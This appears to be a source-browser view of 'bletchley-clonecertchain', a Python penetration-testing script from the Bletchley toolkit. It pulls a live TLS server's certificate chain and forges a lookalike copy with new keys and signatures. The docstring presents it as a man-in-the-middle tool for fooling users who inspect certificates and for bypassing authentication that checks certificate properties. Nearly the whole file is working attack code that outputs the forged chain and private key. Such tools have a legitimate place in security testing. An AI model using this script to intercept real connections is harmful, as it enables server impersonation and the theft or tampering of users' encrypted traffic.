source: trunk/bin/bletchley-clonecertchain @ 79

Last change on this file since 79 was 75, checked in by tim, 10 years ago

more improvements to handshake

  • Property svn:executable set to *
File size: 8.9 KB
Line 
1#!/usr/bin/env python3
2#-*- mode: Python;-*-
3#
4# Requires Python 3+
5
6
7'''
8An experimental script which attempts to clone a server certificate's entire
9certificate chain, ideally altering only the keys and signatures along the
10way.
11
12This is useful in a few man-in-the-middle attack situations, including:
13- You swap out certificates on a user and the manually inspect the certificate
14  properties before accepting them.  Identical properties are more convincing.
15
16- A product includes special-purpose certificate properties that are validated
17  with custom procedures (e.g. client user name, product serial number, ...). 
18  If these properties are validated but the certificate's CA isn't, then cloning
19  the full set of certificate properties is essential to bypass the
20  authentication.
21
22Currently, this script is somewhat limited and buggy, but will hopefully
23improve over time.  Patches welcome!
24
25
26Copyright (C) 2014 Blindspot Security LLC
27Author: Timothy D. Morgan
28
29 This program is free software: you can redistribute it and/or modify
30 it under the terms of the GNU Lesser General Public License, version 3,
31 as published by the Free Software Foundation.
32
33 This program is distributed in the hope that it will be useful,
34 but WITHOUT ANY WARRANTY; without even the implied warranty of
35 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
36 GNU General Public License for more details.
37
38 You should have received a copy of the GNU General Public License
39 along with this program.  If not, see <http://www.gnu.org/licenses/>.
40'''
41
42import sys
43import argparse
44import traceback
45import socket
46try:
47    import OpenSSL
48    from OpenSSL import SSL
49except:
50    sys.stderr.write('ERROR: Could not locate pyOpenSSL module.  Under Debian-based systems, try:\n')
51    sys.stderr.write('       # apt-get install python3-openssl\n')
52    sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n')
53    sys.exit(2)
54
55
56def createClientContext(method=SSL.SSLv3_METHOD):
57    tlsClientContext = SSL.Context(method)
58    tlsClientContext.set_verify(SSL.VERIFY_NONE, (lambda a,b,c,d,e: True))
59    return tlsClientContext
60
61
62def fetchCertificateChain(host, port):
63    protocols = [SSL.SSLv23_METHOD, SSL.TLSv1_METHOD, 
64                 SSL.TLSv1_1_METHOD, SSL.TLSv1_2_METHOD, 
65                 SSL.SSLv3_METHOD, SSL.SSLv2_METHOD]
66
67    chain = None
68    for p in protocols:
69        serverSock = socket.socket()
70        serverSock.connect((host,port))
71   
72        try:
73            server = SSL.Connection(createClientContext(p), serverSock)
74            server.set_connect_state()
75            server.do_handshake()
76        except Exception as e:
77            sys.stderr.write("Exception during handshake with server: \n")
78            traceback.print_exc(file=sys.stderr)
79            sys.stderr.write("\nThis could happen because the server requires "
80                             "certain SSL/TLS versions or a client certificiate."
81                             "  Have no fear, we'll keep trying...\n\n")
82
83        chain = server.get_peer_cert_chain()
84        if chain:
85            return chain
86
87    return chain
88
89
90def normalizeCertificateName(cert_name):
91    n = cert_name.get_components()
92    n.sort()
93    return tuple(n)
94
95
96def normalizeCertificateChain(chain):
97    # Organize certificates by subject and issuer for quick lookups
98    subject_table = {}
99    issuer_table = {}
100    for c in chain:
101        subject_table[normalizeCertificateName(c.get_subject())] = c
102        issuer_table[normalizeCertificateName(c.get_issuer())] = c
103
104    # Now find root or highest-level intermediary
105    root = None
106    for c in chain:
107        i = normalizeCertificateName(c.get_issuer())
108        s = normalizeCertificateName(c.get_subject())
109        if (i == s) or (i not in subject_table):
110            if root != None:
111                sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.")
112            else:
113                # Go with the first identified "root", since that's more likely to link up with the server cert
114                root = c
115
116    # Finally, build the chain from the top-down in the correct order
117    new_chain = []
118    nxt = root
119    while nxt != None:
120        new_chain = [nxt] + new_chain
121        s = normalizeCertificateName(nxt.get_subject())
122        nxt = issuer_table.get(s)
123   
124    return new_chain
125   
126
127def genFakeKey(certificate):
128    fake_key = OpenSSL.crypto.PKey()
129    old_pubkey = certificate.get_pubkey()
130    fake_key.generate_key(old_pubkey.type(), old_pubkey.bits())
131
132    return fake_key
133
134
135def getDigestAlgorithm(certificate):
136    # XXX: ugly hack because pyopenssl API for this is limited
137    if b'md5' in certificate.get_signature_algorithm():
138        return 'md5'
139    else:
140        return 'sha1'
141
142
143def deleteExtension(certificate, index):
144    import cffi
145    from cffi import FFI
146    ffi = FFI()
147    ffi.cdef('''void* X509_delete_ext(void* x, int loc);''')
148    libssl = ffi.dlopen('libssl.so')
149    ext = libssl.X509_delete_ext(certificate._x509, index)
150    #XXX: supposed to free ext here
151
152
153def removePeskyExtensions(certificate):
154    #for index in range(0,certificate.get_extension_count()):
155    #    e = certificate.get_extension(index)
156    #    print("extension %d: %s\n" % (index, e.get_short_name()), e)
157
158    index = 0
159    while index < certificate.get_extension_count():
160        e = certificate.get_extension(index)
161        if e.get_short_name() in (b'subjectKeyIdentifier', b'authorityKeyIdentifier'):
162            deleteExtension(certificate, index)
163            #XXX: would be nice if each of these extensions were re-added with appropriate values
164            index -= 1
165        index += 1
166   
167    #for index in range(0,certificate.get_extension_count()):
168    #    e = certificate.get_extension(index)
169    #    print("extension %d: %s\n" % (index, e.get_short_name()), e)
170
171
172def genFakeCertificateChain(cert_chain):
173    ret_val = []
174    cert_chain.reverse() # start with highest level authority
175
176    c = cert_chain[0]
177    i = normalizeCertificateName(c.get_issuer())
178    s = normalizeCertificateName(c.get_subject())
179    if s != i:
180        # XXX: consider retrieving root locally and including a forged version instead
181        c.set_issuer(c.get_subject())
182    k = genFakeKey(c)
183    c.set_pubkey(k)
184    removePeskyExtensions(c)
185    c.sign(k, getDigestAlgorithm(c))
186    ret_val.append(c)
187
188    prev = k
189    for c in cert_chain[1:]:
190        k = genFakeKey(c)
191        c.set_pubkey(k)
192        removePeskyExtensions(c)
193        c.sign(prev, getDigestAlgorithm(c))
194        prev = k
195        ret_val.append(c)
196
197    ret_val.reverse()
198    return k,ret_val
199
200
201parser = argparse.ArgumentParser(
202    description="An experimental script which attempts to clone an SSL server's"
203    " entire certificate chain, ideally altering only the keys and signatures"
204    " along the way.  The script prints results to stdout, starting with a PKCS7 (PEM)"
205    " key (the fake server private key) followed by the newly forged certificate"
206    " chain, also in PEM format.  (The new intermediate and root private keys are"
207    " not currently printed, but will likely be somehow available in a future"
208    " version.)")
209
210parser.add_argument('host', nargs=1, default=None,
211                    help='IP address or host name of server')
212parser.add_argument('port', nargs='?', type=int, default=443,
213                    help='TCP port number of SSL service (default: 443)')
214parser.add_argument(
215    '--p12', dest='p12_filename', type=str, required=False, default=None,
216    help='If specified, a PKCS12 file will be written with the generated certificates'
217    ' and server key (in addition to normal PKCS7 output).  NOTE: the file specified'
218    ' will be overwritten without prompting if it already exists.')
219parser.add_argument(
220    '--p12password', dest='p12_password', type=str, required=False, default='bletchley',
221    help='If specified along with the --p12 argument, the PKCS12 file will use this password'
222    ' to encrypt the server private key.  (Otherwise, the password "bletchley" is used).')
223options = parser.parse_args()
224
225#print("REAL CHAIN:")
226chain = fetchCertificateChain(options.host[0],options.port)
227#for c in chain:
228#    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
229
230#chain = normalizeCertificateChain(chain)
231#for c in chain:
232#    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
233
234#print("FAKE KEY AND CHAIN:")
235if not chain:
236    sys.stderr.write("ERROR: Could not retrieve server certificate\n\n")
237    sys.exit(2)
238
239fake_key, fake_chain = genFakeCertificateChain(chain)
240print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8'))
241for c in fake_chain:
242    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
243
244if options.p12_filename:
245    p12_file = open(options.p12_filename, 'w+b')
246
247    p12 = OpenSSL.crypto.PKCS12()
248    p12.set_ca_certificates(fake_chain[1:])
249    p12.set_privatekey(fake_key)
250    p12.set_certificate(fake_chain[0])
251
252    p12_file.write(p12.export(passphrase=options.p12_password.encode('utf-8')))
253    p12_file.close()
Note: See TracBrowser for help on using the repository browser.